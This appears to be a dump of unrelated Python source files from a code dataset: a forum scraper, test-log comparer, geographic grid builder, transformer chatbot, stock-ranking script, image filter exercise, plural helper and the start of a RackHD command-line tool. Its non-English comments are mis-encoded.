kepkey.getWCSp(infile,prf[hdu],logfile,verbose)
# close input file
if status == 0:
status = closefits(prf,logfile,verbose)
return img, crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p, status
|
12,977 | 5804747bc3220fdc8fd7b777f9c4270332a00999 | #2020-12-08
#machine > car.py
#machine > tv.py
import machine.car
import machine.tv
machine.car.drive()
machine.tv.watch()
'''
์ด์ ํ๋ค
์์ฒญํ๋ค
'''
|
12,978 | 9fd05aeef60ac4c8bc8b138f9b07c06f9ebd4a22 | # -*- coding: utf-8 -*-
"""
@file: __init__
@author: Memory
@date: 2020/10/11
"""
from .baiduOCR import BaiduOCR
from .xueersiOCR import LatexOCR
from .ocr import OCR
plugin = OCR
|
12,979 | dee0033c3227fa0d6ee15da8adc6a5ee2c06f424 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 16:04:56 2018
@author: LYC
"""
############# ๆPTT ๆฐ็ซน็ ######################################
import requests
from bs4 import BeautifulSoup
import time
import threading
import sys
import xlwt
import xlrd
book = xlwt.Workbook(encoding = "utf-8")
sheet1 = book.add_sheet("่ด้")
def main(orig_args):
filename = "PTTๆฐ็ซน็่ด้.xls"
output(filename)
def output(filename):
sheet1.write(0,0,'็ทจ่')
sheet1.write(0,1,'ๆฅๆ')
sheet1.write(0,2,'็ฉๅ')
sheet1.write(0,3,'็ถฒๅ')
book.save(filename)
main(sys.argv)
def open_save(pos1,pos2,str):
try:
inbook = xlrd.open_workbook('PTTๆฐ็ซน็่ด้.xls',formatting_info = True)
outbook = copy(inbook)
outbook.get_sheet(0).write(pos1,pos2,str)
outbook.save('PTTๆฐ็ซน็่ด้.xls')
except IOError:
print('ERROR!')
sys.exit('No such file: PTTๆฐ็ซน็่ด้.xls')
def get_page(url):
res = requests.get(url)
return res.text
def get_next_url(dom):
soup = BeautifulSoup(dom, 'lxml')
base_url = 'https://www.ptt.cc'
next_url = []
check = []
divs = soup.find_all('div', 'btn-group btn-group-paging')
for d in divs:
#if d.find('a').string == ' ไธ้ ':
#re.search(r'href="/bbs/Beauty/index2191.html">‹ ไธ้ )
# print(d)
# print()
# print(d.find_all('a', 'btn wide')[1])
check = d.find_all('a', 'btn wide disabled')
href = d.find_all('a', 'btn wide')[1]['href']
next_url.append(href)
if check and check[0].text == 'โน ไธ้ ':
print(check[0].text)
return None
# print(base_url + next_url[0])
return base_url + next_url[0]
def get_gift(dom,number):
#print(res.text)
soup = BeautifulSoup(dom, "lxml")
list_title = []
list_date = []
list_author = []
list_link = []
base_url = 'https://www.ptt.cc'
articles = []
divs = soup.find_all('div', 'r-ent')
date = time.strftime("%m/%d")
for d in divs:
# if '0' + d.find('div', 'date').string.lstrip() == date: ##### ๅชๆไปๅคฉ็ ######
# push_count = 0
# if d.find('div', 'nrec').string:
# try:
# push_count = int(d.find('div','nrec').string)
# except ValueError:
# pass
date_article = d.find('div', 'date').string.lstrip()
if d.find('a'):
href = d.find('a')['href']
title = d.find('a').string
articles.append({
# 'push_count': push_count,
'title': title,
'href': base_url + href,
'date': date_article
})
############## DEMO
# print(articles)
# print(len(articles))
gift = '่ด้'
for ord in range(len(articles)):
# ็ขบ่ช็บ่ด้
if articles[ord]['title'][1:3] == gift: # [่ด้]
# ้ฟๅ
่ทlistไธญ็้่ค
Judge = 0
ord_list = 0
for ord_list in range(len(list_title)):
#้่ค
# print(articles[ord]['title'][0:len(articles[ord]['title'])])
# print(list_title)
if len(list_title)!=0 and articles[ord]['title'][0:len(articles[ord]['title'])] == list_title[ord_list]:
Judge = -1
#ๆฒ้่ค
if Judge == 0:
list_title.append(articles[ord]['title'][0:len(articles[ord]['title'])])
list_link.append(articles[ord]['href'][0:len(articles[ord]['href'])])
list_date.append(articles[ord]['date'][0:len(articles[ord]['date'])])
else:
Judge = 0
# ๅญๅ
ฅExcel
for ord_list in range(len(list_title)):
open_save(ord_list+1 + number ,0,ord_list+1 + number)
open_save(ord_list+1 + number ,1,list_date[ord_list])
open_save(ord_list+1 + number ,2,list_title[ord_list])
open_save(ord_list+1 + number ,3,list_link[ord_list])
next_order = number + len(list_title)
return next_order
# print(list_title,list_link,list_date)
############ ๅบๅฎๅ็ง่ทไธๆฌก #############
#def t2():
# while 1:
# get_gift()
# time.sleep(10)
#
#t = threading.Thread(target = t2)
#t.start()
#get_gift()
def percentage(times):
print('ๅฎๆๅบฆ: ''%.2f%%' % (times/4004*100))
urls = 'https://www.ptt.cc/bbs/Hsinchu/index.html'
times = 1;
next_order = 0
while urls != None:
res = get_page(urls)
next_order = get_gift(res,next_order)
# print('next_order = ', next_order)
urls = get_next_url(res)
percentage(times)
times = times + 1
print('Done!!!!!!!!!!!!!!!!!!') |
12,980 | 3a5730fdfe4e92ff97070ce7a995eff21ce71d8d | import re
import sys
src=sys.argv[1]#command line arguments
dest=sys.argv[2]
class matcher:
def __init__(self,sr,dr):
#opeaning file
self.sr=open(src)
self.dr=open(dest)
#temp variables
self.st0=''
self.st1=''
self.dt0=''
self.dt1=''
#dict variables
self.dict1={}
self.dict2={}
#list variables
self.list1= []
self.list2 = []
def ext(self):
#source file extraction
try:
for line in self.sr:
sq = re.search(r'(tempest.*)',line,re.IGNORECASE)
if sq:
result = str(sq.group())
result_split = result.split(' ... ')
self.st0=result_split[0]#temp
self.st1=result_split[1]#temp
result_strip = self.st1.strip('\r')
self.dict1[self.st0]=result_strip #dict
self.list1.append(str(self.st0)+' ... '+str(result_strip))#list
except IndexError:
pass
#destination file extraction
try:
for line in self.dr:
sq = re.search(r'(tempest.[a-zA-Z](.*))',line,re.MULTILINE|re.IGNORECASE)
if sq:
result = str(sq.group())
result_split = result.split(' ... ')
self.dt0=result_split[0]#temp
self.dt1=result_split[1]#temp
result_strip = self.dt1.strip('\r')
self.dict2[self.dt0]=result_strip #dict
self.list2.append(str(self.dt0)+' ... '+str(result_strip))#list
except IndexError:
print 'no error'
def line_count(self):
print "No of lines starting with 'tempest' in Source : ",len(self.dict1)#lines starting with 'tempest' in Source
print "No of lines starting with 'tempest' in Destination : ",len(self.dict2)#lines starting with 'tempest' in Destination
def line_same(self):# same status
count=0
f=open("same.txt",'w+')
for i in self.list1:
for j in self.list2:
if i==j:
f.writelines(i+'\n')#writing to file
count+=1
print "No of lines having status same:", count
f=0
def line_differ(self): #diff status
count=0
f=open("difference.txt",'w+')
for key in self.dict1:
for key1 in self.dict2:
if (key==key1):
if(self.dict1[key]!=self.dict2[key1]):
f.writelines(key+'\n')#writing to file
count=count+1
print "No of lines having status difference",count
f=0
def line_any(self):# ANY STATUS
#source dif count
f=open("any.txt",'w+')
count=0
for key in self.dict1:
if (self.dict1[key]!='ok')&(self.dict1[key]!='FAIL'):
f.writelines(key+'\n')#writing to file
count=count+1
#destination dif count
count1=0
for key in self.dict2:
if(self.dict2[key]!='ok')&(self.dict2[key]!='FAIL'):
f.writelines(key+'\n')#writing to file
count1=count1+1
#add both difference count
print "No of lines having status anything",count+count1
f=0
def line_source(self):#first to second
count=0
f=open("fns.txt",'w+')
for key in self.dict1:
if self.dict2.has_key(key):
continue
else:
f.writelines(key+'\n')#writing to file
count=count+1
print "No of lines available in source not in destination",count
f=0
def line_destination(self):#second to first
count=0
f=open("snf.txt",'w+')
for key in self.dict2:
if self.dict1.has_key(key):
continue
else:
f.writelines(key+'\n')#writing to file
count=count+1
print "No of lines available in destination not in source",count
f=0
a=matcher(src,dest)#calling class
#calling def
a.ext()
a.line_count()
a.line_same()
a.line_differ()
a.line_any()
a.line_source()
a.line_destination() |
12,981 | 0f706bcd1bc0cc197a1bae842811a1829751123a | import random
import sys
import os
import csv
import numpy as np
import createrawmatrix
class structtype():
pass
M = createrawmatrix.M
region = 'global'
earthGrid = np.genfromtxt(os.path.join(os.getcwd(),'elevationdata.csv'), delimiter=',',dtype=float)
earthGrid = np.array(earthGrid)
#earthGrid is a 3601x1801 matrix, where the first column is latitude (89.95 up until -89.95, from North to South with increasing index)
#and the first row being latitude from -179.95 up to 179.95
lats = earthGrid[1::,0]
lons = earthGrid[0,1::]
#strip grid of index column and row and rearrange the matrix to fit index order of createrawmatrix (and other files)
earthGrid = np.delete(earthGrid,0,1) #delete latitude index column
shift = np.where(earthGrid[0] > 0)[0][0]
earthGrid = np.roll(earthGrid,shift,axis=1) #shift matrix from -180 < lon < 180 to 0 < lon < 360
earthGrid = np.delete(earthGrid,0,0) #delete longitude index row
earthGrid = np.flipud(earthGrid) #reverse matrix from 90 > lon > -90 to -90 < lon < 90
#rearrange index order
lons = np.roll(lons,shift)
lats = np.fliplr([lats])[0]
lons[np.where(lons < 0)] += 360
coastalGrid = np.empty(np.shape(earthGrid),dtype=int)
for row in np.arange(lats.size):
for col in np.arange(lons.size):
if earthGrid[row][col] > 9998: #sea
coastalGrid[row][col] = 0
else: #land
coastalGrid[row][col] = 1
#convert input grid to flat indices
inputMesh = np.meshgrid(lons,lats)
nx = inputMesh[0].flatten()
ny = inputMesh[1].flatten()
coastalGrid = coastalGrid.flatten()
ni = np.empty(coastalGrid.shape,dtype='int')
ni[:] = -9999
#compare coastalGrid to createrawmatrix resolution
for d in np.arange(M.nd):
D = np.where((nx >= M.lons[d][0]) & (nx <= M.lons[d][-1]) & (ny >= M.lats[d][0]) & (ny <= M.lats[d][-1]))[0] #take data lons and lats between defined bounds of Model lons and lats.
xi = np.floor( (nx[D]-M.lons[d][0])/M.dd[d] ).astype(int) #iterative start values for lon/lat within area are data values lon/lat minus first lon/lat values divided by stepsize
yi = np.floor( (ny[D]-M.lats[d][0])/M.dd[d] ).astype(int) #see above. If lon of data and lon of model target match, xi[0] = 0, otherwise e.g. lon.data = 4, lon.target = 1, 5 samples per 1 lat -> xi starts at ((4-1)/0.2) = 15. Note: xi/yi is all eligible data values, not just start value
for i in np.arange(xi.size):
ni[D[i]] = np.ravel_multi_index((xi[i],yi[i]),(M.nx[d],M.ny[d]),order='F') #similarly to method in createrawmatrix
resultIndex = np.arange(0,M.nc[d]) #indexation identical to model (createrawmatrix)
resultCoast = np.zeros(M.nc[d]) #array for summing land/sea/coast data per index
resultNorm = np.zeros(M.nc[d]) #amount of cells from input grid per cell for output grid
for i in np.arange(coastalGrid.size) :
if ni[i] > -9900:
if coastalGrid[i] == 1 :
resultCoast[ni[i]] += coastalGrid[i]
resultNorm[ni[i]] += 1
else :
resultNorm[ni[i]] += 1
resultNorm[np.where(resultNorm == 0)] = 100 #edge indices (prime meridian, poles) don't have coastalGrid cells in them (so will remain 0) but also do not alter results. This statements prevents division by zero
resultCoast = resultCoast / resultNorm
f = open("frac_coast_dx_" + str((M.dd[d] * 100).astype(int)) + "_region_" + region + ".csv",'w') #also clear it if it exists
f.write('index,lat,lon,fraction\n')
for i in np.arange(resultIndex.size) : #write land/sea fraction to file for every location
x, y = np.unravel_index(resultIndex[i],(M.nx[d],M.ny[d]),order='F')
f.write(str(resultIndex[i]) + ',' + str(M.lats[d][y]) + ',' + str(M.lons[d][x]) + ',' + str(resultCoast[i]) + '\n')
f.close()
|
12,982 | f1539f9a0b50c775895bc14a04af37d72154d61d | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.quantization
import pickle, random, itertools, os, math, re
import numpy as np
from .settings import *
from .transformer import Transformer, nopeak_mask
from .pre_processing import Voc, process_punct, indexesFromSentence
torch.set_grad_enabled(False)
def model_device(model):
return next(model.parameters()).device
def zeroPadding(l, fillvalue=PAD_token):
return list(itertools.zip_longest(*l, fillvalue=fillvalue))
def binaryMatrix(l, value=PAD_token):
m = []
for i, seq in enumerate(l):
m.append([])
for token in seq:
if token == PAD_token:
m[i].append(0)
else:
m[i].append(1)
return m
# Returns padded input sequence tensor and lengths
def inputVar(indexes_batch):
lengths = torch.tensor([len(indexes) for indexes in indexes_batch])
padList = zeroPadding(indexes_batch)
padVar = torch.LongTensor(padList)
return padVar, lengths
# Returns padded target sequence tensor, padding mask, and max target length
def outputVar(indexes_batch):
max_target_len = max([len(indexes) for indexes in indexes_batch])
padList = zeroPadding(indexes_batch)
mask = binaryMatrix(padList)
mask = torch.ByteTensor(mask)
padVar = torch.LongTensor(padList)
return padVar, mask, max_target_len
# Returns all items for a given batch of pairs
def batch2TrainData(pair_batch):
pair_batch.sort(key=lambda x: len(x[0]), reverse=True) #orden por len of inp
input_batch, output_batch = [], []
for pair in pair_batch:
input_batch.append(pair[0])
output_batch.append([SOS_token]+pair[1])
inp, lengths = inputVar(input_batch)
output, mask, max_target_len = outputVar(output_batch)
return inp, lengths, output, mask, max_target_len
def custom_capitalize(s):
for i, c in enumerate(s):
if c.isalpha():
break
return s[:i] + s[i:].capitalize()
def reformatString(l):
s = l.strip().lower()
# s = re.sub(r"<guion_inic>",r"", s)
s = re.sub(r"\s+([.!?])", r"\1", s)
s = re.sub(r"([ยกยฟ])\s+", r"\1", s)
s = re.sub(r"\s+", r" ", s)
return custom_capitalize(s).strip()
def k_best_outputs(k_outs, out, log_scores, i, k):
""" Gready searcher """
probs, ix = out[:, -1].data.topk(k)
log_probs = torch.Tensor([math.log(p) for p in probs.data.view(-1)]).view(k, -1) + log_scores.transpose(0,1)
k_probs, k_ix = log_probs.view(-1).topk(k)
row = k_ix // k
col = k_ix % k
k_outs[:, :i] = k_outs[row, :i]
k_outs[:, i] = ix[row, col]
log_scores = k_probs.unsqueeze(0)
return k_outs, log_scores
class TransformerChatbot:
def __init__(self,data_path=None,load_quant=True,use_cuda=False):
"""Load model with saved parameters
Args:
data_path: str. Path where the model is saved. Default: ./data/Transformer_500k_UNK
load_quant: bool. Load the quantized version of the model.
use_cuda: bool. Use of GPU.
"""
data_path = os.path.join("data", "Transformer_500k_UNK") if data_path==None else data_path
if not os.path.isdir(data_path) or len(os.listdir(data_path)) == 0:
raise FileNotFoundError(f"No such file or directory: {data_path}, set the path to your model "
"directory or download the pre-trained one from https://github.com/Rvbens/Chatbot-en-Espanol "
"and uncompress on ./data.")
#download('transformer',load_quant)
with open(data_path + '/voc.pkl', 'rb') as f:
self.voc = pickle.load(f)
self.device = torch.device("cuda" if use_cuda else "cpu")
self.model = self.from_checkpoint(data_path,load_quant,use_cuda)
self.searcher = self.beam_search
def from_checkpoint(self,data_path,load_quant=False,use_cuda=torch.cuda.is_available()):
print(f'Loading: {data_path}')
d_model = 512 #original 512
heads = 8
N = 6 #original 6
src_vocab = self.voc.num_words
trg_vocab = self.voc.num_words
model = Transformer(src_vocab, trg_vocab, d_model, N, heads,0.1)
model = model.to(self.device)
if load_quant and use_cuda:
raise RuntimeError('Quantization not supported on CUDA backends')
if load_quant:
loadFilename = os.path.join(data_path, 'checkpoints','transformer_quant_checkpoint.tar')
model = torch.quantization.quantize_dynamic(
model, {nn.LSTM, nn.Linear}, dtype=torch.qint8
)
else:
loadFilename = os.path.join(data_path, 'checkpoints','transformer_checkpoint.tar')
if use_cuda:
checkpoint = torch.load(loadFilename)
else:
checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
model.load_state_dict(checkpoint['params'])
self.voc.__dict__ = checkpoint['voc_dict']
model.eval()
return model
def init_vars(self, src, k):
src_mask = (src != PAD_token).unsqueeze(-2)
e_output = self.model.encoder(src, src_mask)
frst_dec_inp = torch.LongTensor([[SOS_token]]).to(self.device)
trg_mask = nopeak_mask(1).to(self.device)
out = self.model.out(self.model.decoder(frst_dec_inp, e_output, src_mask, trg_mask))
out = F.softmax(out, dim=-1) #(bs,sl,voc_size)
probs, ix = out[:, -1].data.topk(k) #(1,k)
log_scores = torch.Tensor([math.log(prob) for prob in probs.data[0]]).unsqueeze(0) #(1,k)
k_outs = torch.zeros(k, MAX_LENGTH).long().to(self.device)
k_outs[:, 0] = SOS_token
k_outs[:, 1] = ix[0] #first col with all the first k words
e_outputs = torch.zeros(k, e_output.size(-2),e_output.size(-1)).to(self.device)
e_outputs[:, :] = e_output[0]
return k_outs, e_outputs, log_scores
def beam_search(self, model, src, k=10):
k_outs, e_outputs, log_scores = self.init_vars(src, k)
src_mask = (src != PAD_token).unsqueeze(-2)
ind = 0
score= torch.tensor([[1 for i in range(k)]]).float()
for i in range(2, MAX_LENGTH):
trg_mask = nopeak_mask(i).to(self.device)
out = self.model.out(self.model.decoder(k_outs[:,:i],e_outputs, src_mask, trg_mask))
out = F.softmax(out, dim=-1)
k_outs, log_scores = k_best_outputs(k_outs, out, log_scores, i, k)
finish_outs = len(set((k_outs==EOS_token).nonzero()[:,0].cpu().numpy()))
if finish_outs == k:
break
alpha = 0.7
x = (k_outs==EOS_token).nonzero()
EOS_idx = []
out_idx=0
for i in range(len(x)):
if x[i][0] == out_idx:
EOS_idx.append(i)
out_idx+=1
out_lens = x[EOS_idx][:,1]
div = 1/(out_lens.type_as(log_scores)**alpha)
score = log_scores * div
_, ind = torch.max(score, 1)
ind = ind.data[0]
out = k_outs[random.choices([i for i in range(k)], torch.exp(score[0]))]
length = (out[0]==EOS_token).nonzero()[0]
out = out[0][1:length]
return out
def evaluate(self, sentence, max_length=MAX_LENGTH):
### Format input sentence as a batch
# words -> indexes
sentence = sentence.split()
indexes_batch = [indexesFromSentence(sentence, self.voc)] #list of tokens
# Transpose dimensions of batch to match models' expectations
input_batch = torch.LongTensor(indexes_batch).to(self.device) #(bs=1,seq_len)
# Decode sentence with searcher
tokens = self.searcher(self.model, input_batch)
# indexes -> words
decoded_words = [self.voc.index2word[token.item()] for token in tokens]
return decoded_words
def evaluateOneInput(self, input_sentence):
""" Give an answer to the input sentence using the model """
input_sentence = process_punct(input_sentence.encode())
# Evaluate sentence
output_words = self.evaluate(input_sentence)
# Format and print response sentence
output_words[:] = [x for x in output_words if not (x =='SOS' or x == 'EOS' or x == 'PAD')]
raw_ans = ' '.join(output_words)
ans = reformatString(raw_ans)
return ans
def evaluateCycle(self):
""" Continous loop of inputs and answers"""
print("Enter q or quit to exit")
input_sentence = ''
while(1):
# Get input sentence
input_sentence = input('> ')
# Check if it is quit case
if input_sentence == 'q' or input_sentence == 'quit': break
ans = self.evaluateOneInput(input_sentence)
print('Bot:', ans)
|
12,983 | e7f3f2f6abe07b1af0d1bc8eeef431a3d5d757f3 | #! /usr/bin/python
import requests
import csv
import yql
import pdb
from datetime import datetime
from decimal import Decimal
import time
import re
import sys
import os
import multiprocessing
from BeautifulSoup import BeautifulSoup
import StringIO
import getopt
stock_keys = [
"Ticker",
"Company",
"MarketCap",
"PE",
"PS",
"PB",
"PFreeCashFlow",
"DividendYield",
"PerformanceHalfYear",
"Price",
"BB",
"EVEBITDA",
"BBY",
"SHY",
"PERank",
"PSRank",
"PBRank",
"PFCFRank",
"SHYRank",
"EVEBITDARank",
"Rank",
"OVRRank"
]
def generate_snapshot_to_csv(output):
data = {}
generate_snapshot(data)
to_csv(data, output)
def generate_snapshot(data):
print "Creating new snapshot"
import_finviz(data)
import_evebitda(data)
import_buyback_yield(data, False)
compute_rank(data)
return data
def import_finviz(processed_data):
print "Importing data from finviz"
# not using f=cap_smallover since it filters market caps over 300M instead of 200M
#r = requests.get('http://finviz.com/export.ashx?v=152', cookies={"screenerUrl": "screener.ashx?v=152&f=cap_smallover&ft=4", "customTable": "0,1,2,6,7,10,11,13,14,45,65"})
r = requests.get('http://finviz.com/export.ashx?v=152', cookies={"screenerUrl": "screener.ashx?v=152&ft=4", "customTable": "0,1,2,6,7,10,11,13,14,45,65"})
data = csv_to_dicts(r.text)
tickers = []
for row in data:
try:
stock = {}
if row["Ticker"]:
stock["Ticker"] = row["Ticker"]
if "Importing " + row["Company"]:
stock["Company"] = row["Company"]
# Ignore companies with market cap below 200M
if not "Market Cap" in row or row["Market Cap"] == "":
continue
market_cap = Decimal(row["Market Cap"])
if market_cap < 200:
continue
stock["MarketCap"] = row["Market Cap"]
if row["P/E"]:
stock["PE"] = row["P/E"]
if row["P/S"]:
stock["PS"] = row["P/S"]
if row["P/B"]:
stock["PB"] = row["P/B"]
if row["P/Free Cash Flow"]:
stock["PFreeCashFlow"] = row["P/Free Cash Flow"]
if row["Dividend Yield"]:
stock["DividendYield"] = row["Dividend Yield"][:-1]
if row["Performance (Half Year)"]:
stock["PerformanceHalfYear"] = row["Performance (Half Year)"][:-1]
if row["Price"]:
stock["Price"] = row["Price"]
processed_data[stock["Ticker"]] = stock
except Exception as e:
print e
#pdb.set_trace()
print "Finviz data imported"
def import_evebitda(data):
y = yql.Public()
step=100
tickers = data.keys()
for i in range(0,len(tickers),step):
nquery = 'select symbol, EnterpriseValueEBITDA.content from yahoo.finance.keystats where symbol in ({0})'.format('"'+('","'.join(tickers[i:i+step-1])+'"'))
ebitdas = y.execute(nquery, env="http://www.datatables.org/alltables.env")
if ebitdas.results:
for row in ebitdas.results["stats"]:
if "EnterpriseValueEBITDA" in row and row["EnterpriseValueEBITDA"] and row["EnterpriseValueEBITDA"] != "N/A":
data[row["symbol"]]["EVEBITDA"] = row["EnterpriseValueEBITDA"]
else:
pass
def import_single_buyback_yield(stock):
done = False
while not done:
try:
if not stock["MarketCap"]: break
query = "http://finance.yahoo.com/q/cf?s="+stock["Ticker"]+"&ql=1"
r = requests.get(query, timeout=5)
html = r.text
# Repair html
html = html.replace('<div id="yucs-contextual_shortcuts"data-property="finance"data-languagetag="en-us"data-status="active"data-spaceid=""data-cobrand="standard">', '<div id="yucs-contextual_shortcuts" data-property="finance" data-languagetag="en-us" data-status="active" data-spaceid="" data-cobrand="standard">')
html = re.sub(r'(?<!\=)"">', '">', html)
soup = BeautifulSoup(html)
#with open("html.html", "w") as f:
# f.write(html)
#with open("file.html", "w") as f:
# f.write(soup.prettify())
table = soup.find("table", {"class": "yfnc_tabledata1"})
if not table: break
table = table.find("table")
if not table: break
sale = 0
for tr in table.findAll("tr"):
title = tr.td.renderContents().strip()
if title == "Sale Purchase of Stock":
for td in tr.findAll("td")[1:]:
val = td.renderContents().strip()
val = val.replace("(", "-")
val = val.replace(",", "")
val = val.replace(")", "")
val = val.replace(" ", "")
val = val.replace("\n", "")
val = val.replace("\t", "")
val = val.replace("\\n", "")
val = val.replace(" ", "")
if val == "-": continue
sale += int(val)*1000
stock["BB"] = -sale
done = True
except Exception as e:
print e
print "Trying again in 1 sec"
time.sleep(1)
def import_buyback_yield(data, parallel=False):
print "Importing Buyback Yield"
if parallel:
pool = multiprocessing.Pool(4)
pool.map(import_single_buyback_yield, data.values())
else:
for stock in data:
stock = data[stock]
import_single_buyback_yield(stock)
print "Completed Buyback Yield"
def compute_rank(data, step=0):
if step <=4:
compute_bby(data)
if step <=5:
compute_shy(data)
print "Done"
def compute_somerank(data, key, origkey=None, reverse=True, filterpositive=False):
if not origkey:
origkey = key
i = 0
value = None
stocks = sorted([stock for stock in data.values() if origkey in stock and (not filterpositive or stock[origkey] >= 0)], key=lambda k: k[origkey], reverse=reverse)
amt = len(stocks)
for stock in stocks:
if stock[origkey] != value:
last_rank = i
value = stock[origkey]
stock[key+"Rank"] = Decimal(last_rank)/amt*100
i +=1
def compute_perank(data):
compute_somerank(data, "PE")
def compute_psrank(data):
compute_somerank(data, "PS")
def compute_pbrank(data):
compute_somerank(data, "PB")
def compute_pfcfrank(data):
compute_somerank(data, "PFCF", "PFreeCashFlow")
def compute_bby(data):
for stock in [stock for stock in data.values() if "BB" in stock and "MarketCap" in stock]:
stock["BBY"] = Decimal(stock["BB"])/(Decimal(stock["MarketCap"])*1000000)*100
print "Done computing BBY"
def compute_shy(data):
for stock in data.values():
stock["SHY"] = 0
if "DividendYield" in stock:
stock["SHY"] += Decimal(stock["DividendYield"])
if "BBY" in stock:
stock["SHY"] += stock["BBY"]
def compute_shyrank(data):
compute_somerank(data, "SHY", reverse=False)
def compute_evebitdarank(data):
compute_somerank(data, "EVEBITDA", filterpositive=True)
def set_mediums(data):
for stock in data.values():
for key in ["PE", "PS", "PB", "PFCF", "EVEBITDA"]:
if not key + "Rank" in stock:
stock[key + "Rank"] = 50
if "EVEBITDA" in stock and stock["EVEBITDA"] < 0:
stock["EVEBITDARank"] = 50
def compute_stockrank(data):
for stock in data.values():
stock["Rank"] = stock["PERank"]+stock["PSRank"]+stock["PBRank"]+stock["PFCFRank"]+stock["SHYRank"]+stock["EVEBITDARank"]
def compute_overallrank(data):
compute_somerank(data, "OVR", origkey="Rank", reverse=False)
def to_csv(data, output):
date = datetime.now()
datestr = str(int(time.mktime(date.timetuple()))) + '--' + date.strftime('%y-%m-%d')
with open(output+"/snapshot--"+datestr+".csv", "wb") as f:
w = csv.DictWriter(f, stock_keys)
w.writer.writerow(stock_keys)
w.writerows(data.values())
def csv_to_dicts(scsv):
scsv = scsv.encode('ascii', 'ignore')
reader = csv.reader(StringIO.StringIO(scsv))
header = []
res = []
for row in reader:
if header:
data = {}
for i,val in enumerate(row):
data[header[i]] = val
res.append(data)
else:
header = row
if(isDev()):
res = res[:10]
return res
def isDev(isdev=None):
if isdev is not None:
isDev._isdev = isdev
return isDev._isdev
isDev._isdev = 0
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], ':', ['dev', 'output='])
except getopt.GetoptError as err:
print(err)
sys.exit()
print(opts)
output = './snapshots'
for o,a in opts:
if o in ("--dev"):
isDev(1)
elif o in ("--output"):
output = a
else:
print('unhandled op')
generate_snapshot_to_csv(output)
|
12,984 | 73c5e7f80c74ceb29743e253f9b9769c64c3976b | # 2. lena ์์์ ์ด์ฉํ์ฌ ๊ฐ์ค ํ๊ท ๊ฐ ํํฐ๋ง์ ์ํํ์์ค.
# ๋ง์คํฌ๋ ๊ทธ๋ฆผ 4-7์ 3x3๊ณผ 5x5 ๋ง์คํฌ๋ฅผ ์ฌ์ฉํ์ฌ ๊ฐ๊ฐ์ ๊ฒฐ๊ณผ๋ฅผ ํ ํ๋ฉด์ ์ถ๋ ฅํ๊ณ , ์๋ณธ ์ด๋ฏธ์ง์ ๋น๊ตํ์์ค.
import numpy as np
from scipy import signal, misc
import matplotlib.pyplot as plt
from scipy import ndimage
def im_filtering(im, Filter, FilterSize):
row, col = im.shape
padding=int(FilterSize/2)
Image_Buffer = np.zeros(shape=(row+2*padding,col+2*padding), dtype=np.uint8)
Image_Buffer[padding:row+padding, padding:col+padding] = im[:,:]
Image_New = np.zeros(shape=(row,col), dtype=np.uint8)
for y in range(padding,row+padding):
for x in range(padding,col+padding):
buff = Image_Buffer[y-padding:y+padding+1,x-padding:x+padding+1]
pixel = np.sum(buff * Filter)
pixel = np.uint8(np.where(pixel>255,255,np.where(pixel<0,0,pixel)))
Image_New[y-padding,x-padding] = pixel
return Image_New
# ์ด๋ฏธ์ง ์ถ๋ ฅ ํจ์
def image_print(img, title, print_num, current_num):
print(print_num[0])
plt.subplot(print_num[0],print_num[1],current_num)
plt.title(title)
plt.gray()
plt.imshow(img)
plt.axis('off')
lena = misc.imread('image/lena_256.bmp')
Weighted_Filter1=np.array([[1,2,1],[2,4,2],[1,2,1]])
Weighted_Filter1=Weighted_Filter1/np.sum(Weighted_Filter1)
Weighted_Filter2=np.array([[1,4,6,4,1],[4,16,24,16,4],[6,24,36,24,6],[1,4,6,4,1],[4,16,24,16,4]])
Weighted_Filter2=Weighted_Filter2/np.sum(Weighted_Filter2)
Image_New1 = im_filtering(lena, Weighted_Filter1, 3)
Image_New2 = im_filtering(lena, Weighted_Filter2, 5)
image_print(lena,"lena",(1,3),1)
image_print(Image_New1,"3X3",(1,3),2)
image_print(Image_New2,"5X5",(1,3),3)
plt.show() |
12,985 | a9ca7f9cf7354113af8ce3e2c32adb16021aa419 | from task2.configs.const import SPEED_DIRECTORY_PLURAL
# get plural word by number
def plural(number, words):
if number % 10 == 1 and number % 100 != 11:
result = words[0]
elif 2 <= number % 10 <= 4 and (number % 100 < 10 or number % 100 >= 20):
result = words[1]
else:
result = words[2]
return result
# get plural for speed
def plural_speed(number, label):
words = (number, number, number)
values = SPEED_DIRECTORY_PLURAL
if values.get(label.name) is not None:
words = values[label.name]
return plural(number, words)
|
12,986 | f5cfe6e9c245e3bacf72bf54f5a4000c9c6b9752 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
This script is a command line implementation for RackHD
'''
import os
import re
import json
import urlparse
from utils import rackhd_services as rackhd_services
from utils import arg_utils as arg_utils
from utils import arg_parser as arg_parser
from utils import local_utils as local_utils
from utils.mongo_utils import mongo as mongo
import http_request as http_request
#return a tuple with 0: recognized commands namespace and 1: unparsed commands
ARG_LIST, ARG_LIST_UNKNOWN = arg_parser.parse_arguments()
def operate_rackhd_service(operator, services):
'''
Operate RackHD services.
'''
operator = operator + '_rackhd_services'
if services == 'all':
services = None
rackhd = rackhd_services.RackhdServices(services)
getattr(rackhd, operator)()
def parse_api_options(args):
'''
Parse API operatinon options
:param <Object> args: Parsed RackHD CLI arguments
'''
address = {
'server': '172.31.128.1',
'port': '9090',
'protocol': 'http'
}
# Example api /api/current/nodes/<id>/workflows/action
api = {
'opr': args.opr or 'nodes',
'id': args.identity or '',
'subopr': args.subopr or '',
'param': args.param or ''
}
api_ver = args.ver or 'current'
api_string = 'api'
query = ''
#if args.header and args.header != 'application/json':
#header = args.header
#else:
#header = {'content-type': 'application/json'}
options = {
'method': args.method,
# GET, DELETE don't require header
'url': None,
'header': args.header,
'payload': args.payload or ''
}
url_path = '/{}/{}'.format(api_string, api_ver)
if args.api: # User can specify api url
url_path = os.path.join(url_path, args.api)
else:
url_path = os.path.join(url_path, api['opr'], api['id'], api['subopr'], api['param'])
if url_path.endswith('/'):
url_path = url_path[:-1]
netloc = '{}:{}'.format(address['server'], address['port'])
if args.graph:
args.query = 'name={}'.format(args.graph)
if args.query:
query = args.query
url = urlparse.urlunparse((
address['protocol'], # scheme
netloc,
url_path, #path
'', #params
query, #query
False #fragment
))
options['url'] = url
return options
def parse_position_args(unknown_args, known_args):
'''
Parse and combine all arguments
:param unknown_args: tuple from argparse parse_known_args methods
